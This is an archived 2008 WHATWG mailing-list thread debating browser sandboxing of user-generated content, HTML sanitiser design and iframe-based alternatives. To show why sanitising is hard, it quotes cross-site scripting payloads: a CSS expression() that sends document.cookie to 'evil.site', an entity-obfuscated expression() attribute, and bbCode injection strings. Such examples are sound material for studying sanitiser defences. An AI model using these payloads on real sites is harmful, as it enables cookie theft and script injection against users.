 temporary solution to an edge case and it should probably be acceptable.

That is unacceptable. Major websites must accommodate at least 98 % of
their user base at any time, and promoting user agent checking on the
server side is a major issue for me, and most likely for most other
web developers who work on a per-project basis. It would require me
to review already launched sites regularly, which is hardly an efficient
use of my labour.

 Besides, a blog page with 60 comments on it is rather hard to render and
 read so you should probably consider other display options in this case.

I am strongly against making assumptions such as "a blog page with 60
comments on it is rather hard to read, so it will never be a problem". I
prefer scrolling over clicking "next page" any time. If there is a
choice to display 100 comments instead of 10, then I select 100
comments. Also, user generated content might be single-line comments,
or even just a list of single words.

 5.  I am not sure why IFRAME content must be HTTP-secured if the containing
 page is.  The specification does not impose such a restriction AFAIK.  And,
 if you need to go secure, do not allow scribbling in the first place, right?

1. An insecure iframe in a secure document will give you security
warnings from the browser (There are insecure 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Lachlan Hunt

Frode Børli wrote:

 I have been reading up on past discussions on sandboxing content, and
 I feel that it is generally agreed on that there should be some
 mechanism for marking content as user generated. The discussion
 mainly appears to be focused on implementation. Please read my
 implementation notes at the end of this message on how we can include
 this function safely for both HTML 4 and HTML 5 browsers, and still
 allow HTML 4 browsers to function properly.

 My main arguments for having this feature (in one form or another) in
 the browser are:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.


If the sanitiser uses a whitelist based approach that forbids everything 
by default, and then only allows known elements and attributes; and in 
the case of the style attribute, known properties and values that are 
safe, then that would also be the case.
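
A minimal sketch of the whitelist idea applied to the style attribute follows.
It assumes the attribute value has already been extracted and entity-decoded
by a real HTML parser; the property list, the value patterns and the name
sanitizeStyle are illustrative assumptions, not a complete or vetted policy:

```javascript
// Assumed whitelist: property name -> pattern that the whole value must match.
const ALLOWED_STYLES = {
  "color": /^(?:[a-z]+|#[0-9a-f]{3}|#[0-9a-f]{6})$/i,
  "font-weight": /^(?:normal|bold)$/i,
  "text-align": /^(?:left|right|center)$/i,
};

// Keep only declarations whose property and value are both whitelisted;
// everything else is dropped by default.
function sanitizeStyle(styleText) {
  const kept = [];
  for (const declaration of String(styleText).split(";")) {
    const colon = declaration.indexOf(":");
    if (colon === -1) continue;
    const property = declaration.slice(0, colon).trim().toLowerCase();
    const value = declaration.slice(colon + 1).trim();
    const known = Object.prototype.hasOwnProperty.call(ALLOWED_STYLES, property);
    if (known && ALLOWED_STYLES[property].test(value)) {
      kept.push(property + ": " + value);
    }
  }
  return kept.join("; ");
}

console.log(sanitizeStyle("color: blue; width: expression(document.write(1))"));
```

Because unknown properties and values are rejected rather than searched for
known attacks, a construct such as expression(...) is dropped without the
sanitiser having to know about it.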



 - It does not require much skill and effort from the web developer to
 safely sanitize user content.
 - Security bugs are fixed by browser vendors, and not by each web developer.


Note that sandboxing doesn't entirely remove the need for sanitising 
user generated content on the server, it's just an extra line of defence 
in case something slips through.



 The suggested solution of using an attribute on an iframe element
 for storing the user generated content has several problems:

 1: The use of src="" as a fallback means that style information will be
 lost and stylesheets must be loaded again.


This is not a major problem.  If it uses the same stylesheet, which can 
be cached by the browser, then at worst it results in a 304 Not Modified 
response.



 2: The use of src="" yields problems with iframe heights (since the
 src-url must be hosted on another server, javascript cannot fix this)
 and HTML 4 browsers have no other method of adjusting the iframe
 height according to the content.


In recent browsers that support cross-document messaging (Opera 9, 
Safari 3, Firefox 3 and IE 8), you could include a script within the 
comment page that calculates its own height and sends a message to the 
parent page with the info.  In older browsers, just set the height to a 
reasonable minimum and let the user scroll.  Sure, it's not perfect, but 
it's called graceful degradation.
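
The height-reporting idea could look roughly like the sketch below. The
message shape, the type name "comment-height", the function names and the
example origins are all assumptions made for illustration; only
window.postMessage and the "message" event come from cross-document messaging
itself:

```javascript
// Comment page side: serialise the height to report (assumed message shape).
function buildHeightMessage(heightPx) {
  return JSON.stringify({ type: "comment-height", height: Math.ceil(heightPx) });
}

// Parent side: return the reported height, or null if the message is not trusted.
function readHeightMessage(event, expectedOrigin) {
  if (event.origin !== expectedOrigin) return null; // ignore other senders
  let data;
  try {
    data = JSON.parse(event.data);
  } catch (err) {
    return null; // not JSON, so not one of our messages
  }
  if (data === null || typeof data !== "object") return null;
  if (data.type !== "comment-height") return null;
  const height = Number(data.height);
  return Number.isFinite(height) && height > 0 ? height : null;
}

// Wiring (browser only), with placeholder origins and a hypothetical "frame":
//   in the comment page:
//     window.parent.postMessage(
//       buildHeightMessage(document.documentElement.scrollHeight),
//       "https://www.example.com");
//   in the parent page:
//     window.addEventListener("message", function (event) {
//       var h = readHeightMessage(event, "https://comments.example.net");
//       if (h !== null) frame.style.height = h + "px";
//     });
```

Checking event.origin before using the data matters here, since any window
can post a message to the parent page.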



 3: If you have a page that lists 60 comments on a blog, then the user
 agent would have to contact the server 60 times to fetch each comment.
 This again means that perl/php scripts have to be invoked 60 times for
 one page view - that is 61 separate database connections and session
 initializations.


You could always concatenate all of the comments into a single file, 
reducing it down to 1 request.



 4: For the fallback method of using src="" for HTML 4 browsers to
 actually work, the fallback documents must be hosted on a separate
 domain name. This again means that a website using HTTPS must purchase
 and maintain two certificates.


I don't see that as a show stopper.


 My solution:

 If we add a new element <htmlarea></htmlarea>, old browsers will run
 scripts, while new browsers will stop scripts and this is a major
 problem.

 If HTML 5 browsers require everything between <htmlarea></htmlarea> to
 be html entity escaped, that is, < and > must be replaced with &lt; and
 &gt; respectively. If this is not done, HTML 5 browsers will issue a
 severe warning and refuse to display the page. Developers will quickly
 learn.


Draconian error handling is something we really want to avoid,
particularly when such an error can be triggered by failing to
handle user generated content properly.



 HTML 4 browsers will never run scripts (since it will only see plain
 text). HTML 5 browsers will display rich text. It would be completely
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers.


In a separate mail, you wrote:

 <data>
 &lt;user supplied input&gt;
 </data>

 Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4
 browsers will display html, while HTML 5 browsers will display
 correctly formatted code. A simple javascript like this (untested)
 would make the data tags readable for HTML 4 browsers:

 var els = document.getElementsByTagName("DATA");
 for(e in els) els[e].innerHTML =
 els[e].innerHTML.replace(/<&#91;^>&#93;*>/g, "").replace(/\n/g,
 "<br>");


At first, I had no idea what that script was trying to do.  But AFAICT,
you were trying to use this regex: /<[^>]*>/g, which would theoretically
match <foo>.  But, in this context, even with the corrected regex, the
script is entirely useless.


It wouldn't work, for example, with <foo bar=">" baz="xxx">.  But also
because the inner HTML that you're running the regex on is supposed to
have all < and > escaped, and so nothing would be matched anyway.
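
Both failure modes can be reproduced with plain string operations. The
following sketch uses the corrected regex; the function name stripTags and the
sample strings are illustrative assumptions:

```javascript
const TAG_REGEX = /<[^>]*>/g;

// Remove everything the regex considers a tag.
function stripTags(markup) {
  return markup.replace(TAG_REGEX, "");
}

// Case 1: a ">" inside a quoted attribute value ends the match too early,
// so part of the tag is left behind as visible text.
console.log(stripTags('<foo bar=">" baz="xxx">text'));

// Case 2: entity-escaped content contains no literal "<" or ">",
// so nothing matches and the string comes back unchanged.
console.log(stripTags("&lt;b&gt;bold&lt;/b&gt;"));
```

In the first case the match stops at the ">" inside the attribute value; in
the second there is nothing for the regex to find.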



 A problem with this approach is that developers might forget to escape
 tags, therefore I think browsers should display a security warning
 message if the character < or > is encountered

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Kristof Zelechovski
This particular explanation is irrelevant to the topic because sandboxed
fragments can contain scripts, whether within CSS or not.  The idea of
sandboxing is to disable scripts, not to purge them.
Chris

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 8:34 PM
To: Kristof Zelechovski
Cc: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

 1.  Please elaborate how an extension of CSS would require a sanitizer
 update.

In the year 1998: A sanitizer algorithm works perfectly for all
existing methods of adding scripts. It uses a white list, which allows
only certain tags and attributes. Among the allowed attributes are
colspan, rowspan and style - since the web developer wants users to be
able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it
introduces a new invention: CSS expressions. Suddenly the formerly
secure web application is no longer secure. A user adds the following
code, and it passes the sanitizer easily:

<span style='color: blue; width: expression(document.write("<img
src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other brilliant inventions
in the future which will break sanitizers. Of course, we can't know
today which inventions those will be, but sandboxing means that browser
vendors can prevent the above scenario in the future.





Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
 I have been reading up on past discussions on sandboxing content, and
 I feel that it is generally agreed on that there should be some
 mechanism for marking content as user generated. The discussion
 mainly appears to be focused on implementation. Please read my
 implementation notes at the end of this message on how we can include
 this function safely for both HTML 4 and HTML 5 browsers, and still
 allow HTML 4 browsers to function properly.

 My main arguments for having this feature (in one form or another) in
 the browser are:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

 If the sanitiser uses a whitelist based approach that forbids everything by
 default, and then only allows known elements and attributes; and in the case
 of the style attribute, known properties and values that are safe, then that
 would also be the case.

I have written a sanitizer for html and it is very difficult -
especially since browsers have undocumented bugs in their parsing.

Example: <div colspan=&amp;
style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41
colspan=&amp;>Red</div>
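
To see what such a value means to a lenient browser, a sanitizer can decode
character references first, including the ones with a missing semicolon. The
sketch below is a deliberately simplified assumption: it knows only five named
entities, whereas a real HTML parser has the full table and context-dependent
rules, and the function names are hypothetical:

```javascript
const NAMED = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };

// Decode decimal, hexadecimal and a few named references; the trailing ";"
// is optional, mirroring lenient browser parsing.
function decodeEntities(text) {
  return String(text).replace(
    /&(?:#(\d+)|#[xX]([0-9a-fA-F]+)|(amp|lt|gt|quot|apos));?/g,
    (match, dec, hex, name) => {
      if (name) return NAMED[name];
      const codePoint = dec ? parseInt(dec, 10) : parseInt(hex, 16);
      return codePoint > 0 && codePoint <= 0x10ffff
        ? String.fromCodePoint(codePoint)
        : "\uFFFD"; // out-of-range reference becomes the replacement character
    }
  );
}

// Illustrative check only; whitelisting decoded values is the sturdier approach.
function looksLikeCssExpression(attributeValue) {
  return /expression\s*\(/i.test(decodeEntities(attributeValue));
}

const styleValue =
  "font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41";
console.log(decodeEntities(styleValue));
```

Once decoded, the obfuscated value is an ordinary expression(...) call, which
is why inspecting the raw, undecoded text is not enough.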

The proof that sanitizing HTML is difficult is the fact that no major
site even attempts it. Even Wikipedia uses some obscure wiki-language,
instead of implementing a wysiwyg editor.

 Note that sandboxing doesn't entirely remove the need for sanitising user
 generated content on the server, it's just an extra line of defence in case
 something slips through.

Of course. However, the sandbox feature in the browser will be fail-safe if
user generated content is escaped with &lt; and &gt; before being sent
to the browser - as long as the browser does not have bugs, of course.

 The suggested solution of using an attribute on an iframe element
 for storing the user generated content has several problems:
 1: The use of src="" as a fallback means that style information will be
 lost and stylesheets must be loaded again.
 This is not a major problem.  If it uses the same stylesheet, which can be
 cached by the browser, then at worst it results in a 304 Not Modified
 response.

Many small streams make a big river...

 2: The use of src="" yields problems with iframe heights (since the
 src-url must be hosted on another server, javascript cannot fix this)
 and HTML 4 browsers have no other method of adjusting the iframe
 height according to the content.
 In recent browsers that support cross-document messaging (Opera 9, Safari 3,
 Firefox 3 and IE 8), you could include a script within the comment page that
 calculates its own height and sends a message to the parent page with the
 info.  In older browsers, just set the height to a reasonable minimum and
 let the user scroll.  Sure, it's not perfect, but it's called graceful
 degradation.

Much more difficult to implement than a <sandbox></sandbox> mechanism
- and I do not see the point of giving more work to web developers when
it could be fixed so easily.

 3: If you have a page that lists 60 comments on a blog, then the user
 agent would have to contact the server 60 times to fetch each comment.
 This again means that perl/php scripts have to be invoked 60 times for
 one page view - that is 61 separate database connections and session
 initializations.
 You could always concatenate all of the comments into a single file,
 reducing it down to 1 request.

No you could not, if you for example want people to report comments or
give them votes - which in the Web 2.0 world requires scripting.

 4: For the fallback method of using src="" for HTML 4 browsers to
 actually work, the fallback documents must be hosted on a separate
 domain name. This again means that a website using HTTPS must purchase
 and maintain two certificates.
 I don't see that as a show stopper.

Well, I am not going to argue anymore. I have not heard anybody talk
in favour of a sandbox mechanism here or contribute something
constructive. The only feedback has been that you could do it with
iframes, and if it looks ugly with HTML 4 browsers, then that is only
graceful degradation, so it is okay. Maybe the future is Flash and
Silverlight after all. We'll see.

 If HTML 5 browsers require everything between <htmlarea></htmlarea> to
 be html entity escaped, that is, < and > must be replaced with &lt; and
 &gt; respectively. If this is not done, HTML 5 browsers will issue a
 severe warning and refuse to display the page. Developers will quickly
 learn.

 Draconian error handling is something we really want to avoid, particularly
 when such an error can be triggered by failing to handle user generated
 content properly.

I see that argument. Maybe you have a suggestion to what should happen
if unescaped HTML is encountered then?

 HTML 4 browsers will never run scripts (since it will only see plain
 text). HTML 5 browsers will display rich text. It would be completely
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Kristof Zelechovski
The problem with the tag warning is that, if </data> is the first token
inserted, there will be no warning because the resulting code will be valid.
So the key question remains: how do you tell an unescaped </data> from the
closing </data>?  And the warning, if applicable, will go to the wrong
person: to all readers instead of just one writer.
What is invalid about <img alt=">" src="next.png">?
It is not enough to scratch some JavaScript that will look all right and
correctly sift out plain text for some test cases; you would have to prove
that it does the right thing in all cases.
Contrary to what you say, MediaWiki sanitizes HTML.  You can contribute to
Wikipedia without using their templates; the templates are there just to
make contributing easier.
It should be possible to keep all contributed content in one file with units
identified as document fragments.  You still have one request per one unit
but all of them request the same data file.
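
One possible reading of the single-file idea is sketched below. The data
shape, the "comment-N" id scheme, the function names and the :target style
rule are assumptions added for illustration; the comment HTML is assumed to
have been sanitised already:

```javascript
// Assumption: each comment is { id: number, sanitizedHtml: string }.
function buildCommentsDocument(comments) {
  const units = comments.map(
    (c) => `<div class="comment" id="comment-${Number(c.id)}">${c.sanitizedHtml}</div>`
  );
  return [
    "<!DOCTYPE html>",
    "<title>Comments</title>",
    // Assumed extra: show only the unit addressed by the URL fragment.
    "<style>.comment { display: none } .comment:target { display: block }</style>",
    ...units,
  ].join("\n");
}

// Each iframe points at the same file and differs only in its fragment.
function commentFrameUrl(fileUrl, id) {
  return `${fileUrl}#comment-${Number(id)}`;
}

console.log(commentFrameUrl("https://comments.example.net/post-7.html", 3));
```

Since every frame requests the same URL apart from the fragment, the browser
can serve all but the first request from its cache.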

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Wednesday, June 18, 2008 12:12 AM
To: Lachlan Hunt
Cc: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

 I have been reading up on past discussions on sandboxing content, and
 I feel that it is generally agreed on that there should be some
 mechanism for marking content as user generated. The discussion
 mainly appears to be focused on implementation. Please read my
 implementation notes at the end of this message on how we can include
 this function safely for both HTML 4 and HTML 5 browsers, and still
 allow HTML 4 browsers to function properly.

 My main arguments for having this feature (in one form or another) in
 the browser are:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

 If the sanitiser uses a whitelist based approach that forbids everything by
 default, and then only allows known elements and attributes; and in the case
 of the style attribute, known properties and values that are safe, then that
 would also be the case.

I have written a sanitizer for html and it is very difficult -
especially since browsers have undocumented bugs in their parsing.

Example: <div colspan=&amp;
style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41
colspan=&amp;>Red</div>

The proof that sanitizing HTML is difficult is the fact that no major
site even attempts it. Even Wikipedia uses some obscure wiki-language,
instead of implementing a wysiwyg editor.

[snip]

 2: The use of src="" yields problems with iframe heights (since the
 src-url must be hosted on another server, javascript cannot fix this)
 and HTML 4 browsers have no other method of adjusting the iframe
 height according to the content.
 In recent browsers that support cross-document messaging (Opera 9, Safari 3,
 Firefox 3 and IE 8), you could include a script within the comment page that
 calculates its own height and sends a message to the parent page with the
 info.  In older browsers, just set the height to a reasonable minimum and
 let the user scroll.  Sure, it's not perfect, but it's called graceful
 degradation.

Much more difficult to implement than a <sandbox></sandbox> mechanism
- and I do not see the point of giving more work to web developers when
it could be fixed so easily.

 3: If you have a page that lists 60 comments on a blog, then the user
 agent would have to contact the server 60 times to fetch each comment.
 This again means that perl/php scripts have to be invoked 60 times for
 one page view - that is 61 separate database connections and session
 initializations.
 You could always concatenate all of the comments into a single file,
 reducing it down to 1 request.

No you could not, if you for example want people to report comments or
give them votes - which in the Web 2.0 world requires scripting.

[snip]

 If HTML 5 browsers require everything between <htmlarea></htmlarea> to
 be html entity escaped, that is, < and > must be replaced with &lt; and
 &gt; respectively. If this is not done, HTML 5 browsers will issue a
 severe warning and refuse to display the page. Developers will quickly
 learn.

 Draconian error handling is something we really want to avoid, particularly
 when such an error can be triggered by failing to handle user generated
 content properly.

I see that argument. Maybe you have a suggestion to what should happen
if unescaped HTML is encountered then?

 HTML 4 browsers will never run scripts (since it will only see plain
 text). HTML 5 browsers will display rich text. It would be completely
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers..

 In a separate mail, you wrote:
 <data>
 &lt;user supplied input&gt;
 </data>

 Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4
 browsers will display html, while HTML 5 browsers will display
 correctly formatted code. A simple

[whatwg] Sandboxing to accommodate user generated content.

2008-06-16 Thread Frode Børli
Hi! I am a new member of this mailing list, and I wish to contribute with a
couple of specific requirements that I believe should be discussed and
perhaps implemented in the final specification. I am unsure if this is the
correct place to post my ideas (or if my ideas are even new), but if it is
not, then I am sure somebody will instruct me. :) One person told me that
the specification was finished and no new features would be added from now
on - but hopefully that is not true.


The challenge:

More and more websites have features where users can contribute with user
generated content - often in the form of audio, video, images
or wiki-articles. An older type of content contribution is normal text such
as posts in a discussion forum, a mailing list such as this and comments on
blog articles.

A major challenge for many web developers is validating untrusted content
such as the message body of a blog comment. Unless the developer has a
flawless and future proof algorithm for ensuring that the message body does
not contain any script, web developers have to resort to text only - or
bbCode-style markup languages to allow users to post text content with
richer formatting. If the developer wants to enable rich formatting using
bbCode, he or she also needs fairly advanced methods of ensuring that no
scripts are executed. Consider this bbCode example:
[img]some_image.jpg'onmouseover=maliciousScript()[/img]. The bbCode parser
must ensure that there is absolutely no method of injecting scripts in user
posts - and that is very difficult when at the same time there exist
parsing errors in browsers. The example could easily be validated by not
allowing apostrophes or quotation marks in urls - but then we have multiple
entities that could be used: &apos; or &#39;. To make matters worse, some
browsers parse &#39, which is an incomplete html entity, and all these
variations must be considered by the bbCode parser author.
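
Rather than listing every variation to forbid, a parser can accept only URLs
made of characters known to be harmless and reject everything else. The
following is a sketch under that assumption; the pattern, the function names
and the conservative character set (no query strings, for instance) are
illustrative choices, not a complete URL policy:

```javascript
// Assumed policy: optional http(s) scheme followed by a conservative character set.
// Apostrophes, quotation marks, "&", "=", "(" and ")" are all outside the set.
const SAFE_URL = /^(?:https?:\/\/)?[\w.~\/%-]+$/;

function escapeAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Translate the URL of an [img] tag; reject rather than try to repair.
function renderBbImg(url) {
  if (!SAFE_URL.test(url)) return "";
  // Escaping is redundant given SAFE_URL, but kept as a second line of defence.
  return '<img src="' + escapeAttribute(url) + '" alt="">';
}

console.log(renderBbImg("some_image.jpg"));
console.log(renderBbImg("some_image.jpg'onmouseover=maliciousScript()"));
```

Because "&" is not in the accepted set, entity forms such as &apos;, &#39;
and the incomplete &#39 are rejected along with the literal apostrophe.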

Another problem which makes future proofing this type of security difficult
is that standards evolve. A few years ago you could safely allow users to
apply css-styles to tags. Example bbCode tag [color=blue]Blue text[/color]
would be translated to <span style='color: blue'>Blue text</span>. In this
example an exploit could be [color=expression(maliciousCode())]Text[/color].
When the algorithm was made, it was considered secure, since no script could
ever be executed inside a style attribute. With the invention of expressions
and behaviours etc the knowledge required by web developers is ever
increasing, and web developers have to review all old code whenever new
technologies emerge - because what once was secure suddenly is not secure
anymore.
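
A translation that accepts only colour values matching a known-safe pattern
would not have been affected by the arrival of expressions. A minimal sketch,
in which the pattern and the function names are assumptions made for
illustration:

```javascript
// Assumed whitelist: a plain colour keyword or a 3- or 6-digit hex colour.
const SAFE_COLOR = /^(?:[a-zA-Z]{1,20}|#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6})$/;

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Escape everything first, then translate [color=...] tags whose value is safe.
// A tag with an unsafe value is dropped and only its text is kept.
function renderBbColor(bbCode) {
  return escapeHtml(bbCode).replace(
    /\[color=([^\]]*)\]([\s\S]*?)\[\/color\]/g,
    (match, color, text) =>
      SAFE_COLOR.test(color)
        ? "<span style='color: " + color + "'>" + text + "</span>"
        : text
  );
}

console.log(renderBbColor("[color=blue]Blue text[/color]"));
console.log(renderBbColor("[color=expression(maliciousCode())]Text[/color]"));
```

The second call prints only the text, because the parentheses in the value do
not match the pattern.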


One solution:

<htmlarea>User generated content</htmlarea>


No scripts would ever be allowed to be executed inside this tag. Malicious
users could potentially submit </htmlarea> unsafe content <htmlarea> and
get around this. There are as I can see it two solutions to this:

User generated content inside the tag must be escaped using html entities
(but still rendered as html by the user agent), or the author must prevent
users from submitting the string </htmlarea> and all possible variations
of the tag.

If the first solution is used, then browsers should display a
strong security warning if unescaped content is seen between htmlarea-tags
on a website (to educate web developers).


A sidenote: The tag name I chose is based on the <textarea> tags, whose
content should also be entity escaped to prevent users from inserting the
text </textarea>.  This currently breaks a lot of web pages - so perhaps a
strong security warning would be appropriate if unescaped content is found
after the <textarea> start tag also?


-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no

Mobile:
+47 406 16 637
Company:
+47 216 90 000
Fax:
+47 216 91 000


Think about the environment. Do not print this e-mail unless you really need
to.

Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.




